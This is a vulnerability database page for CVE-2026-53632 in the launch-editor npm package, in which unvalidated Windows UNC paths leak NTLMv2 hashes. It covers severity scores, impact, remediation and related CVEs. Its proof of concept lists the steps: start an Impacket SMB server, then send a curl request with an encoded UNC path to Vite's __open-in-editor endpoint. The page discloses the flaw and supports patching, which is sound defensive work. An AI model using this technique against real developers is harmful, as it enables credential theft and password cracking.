Skip to main content

launch-editor EUVDEUVD-2026-38299

| CVE-2026-53632 MEDIUM
External Control of File Name or Path (CWE-73)
2026-06-15 https://github.com/vitejs/launch-editor GHSA-v6wh-96g9-6wx3
5.5
CVSS 4.0 · Vendor: https://github.com/vitejs/launch-editor
Share

Severity by source

Vendor (https://github.com/vitejs/launch-editor) PRIMARY
5.5 MEDIUM
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
5.3 MEDIUM

AV:N for network-initiated attack via HTTP; AC:H for multiple required coincident conditions (Windows, NTLM enabled, dev server running, attacker-known URL); UI:R because victim must visit attacker's page; C:H for NTLMv2 hash disclosure; no integrity or availability impact.

3.1 AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
4.0 AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

Primary rating from Vendor (https://github.com/vitejs/launch-editor).

CVSS VectorVendor: https://github.com/vitejs/launch-editor

CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
High
Privileges Required
None
User Interaction
A
Scope
X

Lifecycle Timeline

3
CVSS changed
Jun 22, 2026 - 18:23 NVD
5.5 (MEDIUM)
Source Code Evidence Fetched
Jun 15, 2026 - 17:51 vuln.today
Analysis Generated
Jun 15, 2026 - 17:51 vuln.today

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 46,771 npm packages depend on launch-editor (530 direct, 46,262 indirect)
  • 32 npm packages depend on vite (28 direct, 4 indirect)
  • 14 npm packages depend on vite-plus (10 direct, 4 indirect)

Ecosystem-wide dependent count for version 2.14.1 and other introduced versions.

DescriptionCVE.org

Summary

The launch-editor NPM package accesses arbitrary paths including Windows UNC paths. When a UNC path is opened, Windows automatically attempts NTLM authentication to the remote host, causing the user’s NTLMv2 password hash to be leaked to an attacker-controlled SMB server. This can result in credential compromise through offline hash cracking.

Impact

If the following conditions are met, an attacker can get the NTLMv2 password hash on the computer that is using the launch-editor:

  • using Windows
  • NTLM is not disabled (it is recommended to disable, while it's still enabled by default)
  • the user accesses the attackers website that sends request to a middleware using launch-editor
  • the server that has the middleware using launch-editor is running
  • the attacker knows the URL for that server and the middleware

This would be a problem if the user password is too simple that it can be identified through offline hash cracking, potentially leading to further compromise of developer accounts or internal systems.

Details

launch-editor accepts file paths without validating or restricting Windows UNC paths such as:

\\attacker-host\share

On Windows systems, accessing a UNC path triggers an automatic NTLM authentication attempt to the remote SMB server. No user interaction or warning is required for this authentication attempt to occur.

If an attacker controls the SMB server referenced by the UNC path the victim’s NTLMv2 hash is transmitted to the attacker. The attacker can then capture the hash and perform offline password cracking. Successful cracking reveals the victim’s cleartext password.

The attacker could target a developer that uses a development server using launch-editor to develop code locally, send them a link and grab their NTLMv2 hash.

PoC

From the attacker side, we will setup an SMB server. I personally used Impacket's smbserver.py, but you could use something like Responder for this as well. For keeping it simple, we will use smbserver.py here.

First, let's create a directory to serve as an SMB share.

mkdir /tmp/data
echo "Hello world" > /tmp/data/test.txt

Then, start the SMB server.

$ sudo smbserver.py -smb2support -debug share /tmp/data

Now, run any project that uses the launch-editor package. I have setup a simple "Hello world" project that uses Vite to do this. Then run the project locally (vite).

Now last, we will open a browser window and navigate to the URL used by the launch-editor package to trigger the NTLM authentication. Or we can use curl to achieve the same.

curl 'http://localhost:5173/__open-in-editor?file=%5c%5c127.0.0.1%5cshare%5ctest.txt'

Note the IP address in the HTTP request, and make sure it connects to the IP address of the SMB server. Now we can look at the logs of smbserver.py and see the NTLMv2 hash coming in.

<img width="1916" height="277" alt="2026-01-30_10-58" src="https://github.com/user-attachments/assets/2f606e8f-c9bb-41dc-b507-ea6606b53368" />

AnalysisAI

NTLMv2 hash disclosure in the launch-editor NPM package (v2.14.0 and earlier) exposes developer credentials on Windows systems when an attacker-controlled UNC path is passed to the package's file-opening HTTP middleware. The attack is achievable by tricking a developer running a local development server such as Vite into visiting an attacker-controlled webpage that issues a cross-origin request to the local __open-in-editor endpoint with a crafted \\attacker-host\share UNC path, whereupon Windows automatically initiates NTLM authentication without any user prompt, transmitting the victim's NTLMv2 hash to the attacker's SMB server. Publicly available exploit code confirmed via the advisory PoC using Impacket smbserver.py and Responder lowers the barrier significantly; no active exploitation has been confirmed via CISA KEV at time of analysis.

Technical ContextAI

The launch-editor package (pkg:npm/launch-editor) is a development-time utility that opens source files in editors from within a running browser application; Vite and similar tools expose it via an HTTP middleware endpoint such as /__open-in-editor. The root cause is CWE-73 (External Control of File Name or Path): the package accepts the file query parameter value and passes it directly to the editor-opening logic without validating or blocking Windows UNC paths of the form \\host\share. On Windows, any attempt to access a UNC path causes the OS to initiate an SMBv2 authentication handshake to the specified host, automatically sending the logged-in user's NTLMv2 challenge-response hash - a known Windows authentication coercion technique exploited by tools such as Responder and Impacket. Because NTLM is enabled by default in Windows (despite Microsoft's ongoing phase-out guidance), the hash is transmitted silently and without user warning. The vulnerability propagates through the dependency tree to any project bundling launch-editor, most notably Vite (pkg:npm/vite) and vite-plus (pkg:npm/vite-plus), making developer workstations the primary attack surface.

RemediationAI

The primary remediation is to upgrade launch-editor to version 2.14.1 or later, which introduces UNC path validation to block this attack class. For Vite users, upgrading to the fixed Vite release automatically pulls in the patched launch-editor: use Vite 6.4.3 for the 6.x branch, Vite 7.3.5 for the 7.x branch, or Vite 8.0.16 for the 8.x branch. Full advisory details are at https://github.com/vitejs/launch-editor/security/advisories/GHSA-v6wh-96g9-6wx3. Where immediate patching is not possible, the most effective OS-level compensating control is to disable NTLM on developer workstations per Microsoft's guidance at https://techcommunity.microsoft.com/blog/windows-itpro-blog/advancing-windows-security-disabling-ntlm-by-default/4489526; this blocks the authentication coercion entirely but may break legacy application compatibility requiring prior testing. A network-level control is to block outbound SMB traffic (TCP 445) from developer machines to untrusted external hosts via host-based or perimeter firewall rules, which prevents the NTLM handshake from reaching an attacker's server without fixing the root path-validation flaw. Additionally, the dev server's __open-in-editor middleware should never be exposed beyond localhost; binding the dev server to 127.0.0.1 and enforcing this with a host firewall reduces the attack surface even if the package remains temporarily unpatched, since it prevents the attacker from directly reaching the endpoint from outside the local machine (though the SSRF-via-browser vector still applies).

CVE-2024-55591 CRITICAL POC
9.8 Jan 14

FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote

CVE-2014-7205 CRITICAL POC
10.0 Oct 08

Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t

CVE-2025-59528 CRITICAL POC
10.0 Sep 22

Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete

CVE-2017-14849 HIGH POC
7.5 Sep 28

Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc

CVE-2017-5941 CRITICAL POC
9.8 Feb 09

An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner

CVE-2014-3744 HIGH POC
7.5 Oct 23

Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi

CVE-2014-9566 HIGH POC
7.5 Mar 10

Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin

CVE-2013-4660 MEDIUM POC
6.8 Jun 28

The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic

CVE-2015-5688 MEDIUM POC
5.0 Sep 04

Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read

CVE-2026-45321 CRITICAL POC
9.6 May 12

Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio

CVE-2014-7192 CRITICAL POC
10.0 Dec 11

Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat

CVE-2013-4450 MEDIUM POC
5.0 Oct 21

The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se

Share

EUVD-2026-38299 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy